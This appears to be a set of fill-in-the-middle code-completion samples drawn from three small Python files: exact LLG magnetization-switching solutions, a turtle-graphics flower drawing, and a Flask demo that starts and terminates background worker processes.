<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def <|fim_middle|>(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | azi_into_range |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def <|fim_middle|>(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | generate_dynamics |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def <|fim_middle|>(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | plot_dynamics |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def <|fim_middle|>(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | calculate_equivalent_dynamics |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def <|fim_middle|>(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
    m_as_sph_points = [utils.array2sph(m) for m in ms]  # a real list: it is traversed twice below
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | plot_vs_exact |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":<|fim▁hole|> main()<|fim▁end|> | |
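# Geometry note for bloom() above: turtle.circle(radius+rad, rad) runs with
# the pen up, so it only walks the turtle `rad` degrees along an arc to the
# next petal position, and turtle.circle(-rad) then draws the petal clockwise.
# Tiny standalone demo of the pen-up positioning trick (needs a display):
import turtle

pen = turtle.Turtle()
pen.up()
pen.circle(50, 90)   # travel a quarter-arc without drawing
pen.down()
pen.circle(-10)      # draw a small clockwise circle there
turtle.done()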
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
<|fim_middle|>
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
main()
<|fim▁end|> | turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill() |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
<|fim_middle|>
###
if __name__ == "__main__":
main()
<|fim▁end|> | """Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick() |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
<|fim_middle|>
<|fim▁end|> | main() |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def <|fim_middle|>(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
main()
<|fim▁end|> | bloom |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def <|fim_middle|>():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
main()
<|fim▁end|> | main |
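The drawing trick in bloom() above rests on two turtle behaviors: the two-argument form turtle.circle(radius, extent) moves along an arc of extent degrees (with the pen up it only repositions), and a negative radius makes the turtle bend clockwise. A minimal sketch of the same idea, with illustrative ring and petal sizes:

import turtle

turtle.up()
turtle.circle(50, 45)   # glide 45 degrees along a radius-50 arc without drawing
turtle.down()
turtle.circle(-20)      # draw one full petal circle, curving clockwise
turtle.done()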
<|file_name|>test.py<|end_file_name|><|fim▁begin|>import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
<|fim▁hole|> p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()<|fim▁end|> | @app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc: |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
<|fim_middle|>
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later') |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
<|fim_middle|>
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive()) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
<|fim_middle|>
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | backProc.terminate()
return 'killed: ' + str(backProc.pid) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
<|fim_middle|>
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all' |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
<|fim_middle|>
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
<|fim_middle|>
if __name__ == '__main__':
app.run()
<|fim▁end|> | global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
<|fim_middle|>
<|fim▁end|> | app.run() |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def <|fim_middle|>():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | testFun |
